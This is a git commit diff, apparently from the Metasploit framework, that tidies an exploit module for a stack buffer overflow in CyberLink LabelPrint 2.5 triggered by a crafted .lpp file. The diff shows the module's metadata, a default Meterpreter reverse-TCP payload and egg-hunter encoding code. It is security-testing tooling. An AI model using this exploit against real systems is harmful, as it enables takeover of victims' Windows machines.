Fix syntax, minor edits

2018-12-11 07:55:20 -06:00 · 2018-12-11 07:55:20 -06:00 · 165f082160
parent 1bc024eaa7
commit 165f082160
1 changed files with 8 additions and 15 deletions
--- a/modules/exploits/windows/fileformat/cyberlink_lpp_bof.rb
+++ b/modules/exploits/windows/fileformat/cyberlink_lpp_bof.rb
@ -7,16 +7,15 @@ class MetasploitModule < Msf::Exploit
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
-  include Msf::Exploit::Seh

  def initialize(info={})
    super(update_info(info,
      'Name'           => "CyberLink LabelPrint 2.5 Stack Buffer Overflow",
      'Description'    => %q{
-       This module exploits a stack buffer overflow in CyberLink LabelPrint 2.5 and below.
-       The vulnerability is triggered when opening a .lpp project file containing overly long string characters
-       via open file menu. This results in overwriting a structured exception handler record and take over the
-       application. This module has been tested on Windows 7 (64 bit), Windows 8.1 (64 bit), and Windows 10 (64 bit).
+        This module exploits a stack buffer overflow in CyberLink LabelPrint 2.5 and below.
+        The vulnerability is triggered when opening a .lpp project file containing overly long string characters
+        via open file menu. This results in overwriting a structured exception handler record and take over the
+        application. This module has been tested on Windows 7 (64 bit), Windows 8.1 (64 bit), and Windows 10 (64 bit).
      },
      'License'         => MSF_LICENSE,
      'Author'          =>
@ -31,6 +30,7 @@ class MetasploitModule < Msf::Exploit
        ],
      'DefaultOptions'  =>
        {
+          'FILENAME' => 'msf.lpp',
          'EXITFUNC' => 'seh',
          'DisablePayloadHandler' => 'true',
          'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
@ -66,23 +66,16 @@ class MetasploitModule < Msf::Exploit
      'Payload'         =>
        {
          'Space'       => 15000,
-          'BadChars'    => "\x00", #badchars starts from \x80 to \xff
          'DisableNops' => true
        },
      'DisclosureDate'  => 'Sep 23 2017',
      'DefaultTarget'   => 0))
-
-    register_options(
-    [
-      OptString.new('FILENAME', [true, 'The malicious file name', 'msf.lpp'])
-    ])
  end

  def get_payload(hunter)
-      enc = framework.encoders.create('x86/unicode_mixed')
-      enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' })
-      hunter = enc.encode(hunter, nil, nil, platform)
-  return hunter
+    enc = framework.encoders.create('x86/unicode_mixed')
+    enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' })
+    hunter = enc.encode(hunter, nil, nil, platform)
  end

  def exploit